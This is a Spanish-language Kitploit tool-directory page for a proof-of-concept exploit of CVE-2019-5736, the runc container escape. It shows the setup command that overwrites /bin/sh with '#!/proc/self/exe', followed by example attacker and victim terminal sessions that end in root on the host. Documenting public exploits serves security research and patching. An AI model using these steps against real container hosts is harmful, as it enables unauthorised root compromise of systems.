Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-5736-PoC — Exploit de prueba de concepto para CVE-2019-5736, un escape de contenedor runc que sobrescribe el binario runc del host para lograr la ejecución de código root en el host. | Kitploit
Herramientas/GitHubGitHub/billith/cve-2019-5736-poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónRed TeamingEscape de Contenedores
GitHubbillith/cve-2019-5736-poc

CVE-2019-5736-PoC

Exploit de prueba de concepto para CVE-2019-5736, un escape de contenedor runc que sobrescribe el binario runc del host para lograr la ejecución de código root en el host.

Ver Repositorio
6hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Uso

El PoC fue creado para el escenario donde la víctima está ejecutando, por ejemplo, docker exec <container> sh. Antes de ejecutar el exploit, es necesario sobrescribir el binario sh en el sistema de archivos del contenedor:

root@kitploit:~
printf '#!/proc/self/exe' > /bin/sh

Después de eso, cuando la víctima ejecuta el comando exec, el binario runc en el sistema de archivos del host debe ser sobrescrito con el código definido en el exploit

Ejemplo

terminal del contenedor:

root@kitploit:~
root@cebad431c120:/# printf '#!/proc/self/exe' > /bin/sh
root@cebad431c120:/# ./exp  # Waits until victim issues the exec command
Found process: 42851
Exploiting PID: /proc/42851/exe
Time to PWN
Success! Next time runc is run we will get RCE!
root@cebad431c120:/# 

terminal de la víctima:

root@kitploit:~
user@server:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
user@server:~$ sudo docker exec cebad431c120 sh
No help topic for '/usr/bin/sh'
user@server:~$ sudo docker exec cebad431c120 sh
pwned
uid=0(root) gid=0(root) groups=0(root)
failed to retrieve OCI runtime exec pid: open /run/containerd/io.containerd.runtime.v1.linux/moby/cebad431c120d2378925e0712efaafe844616d618d99df4a479283d45f86c0fc/a70ea68c10e0eb3912fde8978e879e77b04ed32731338329024140db47dce1d3.pid: no such file or directory: unknown
user@server:~$ 
Descargar herramienta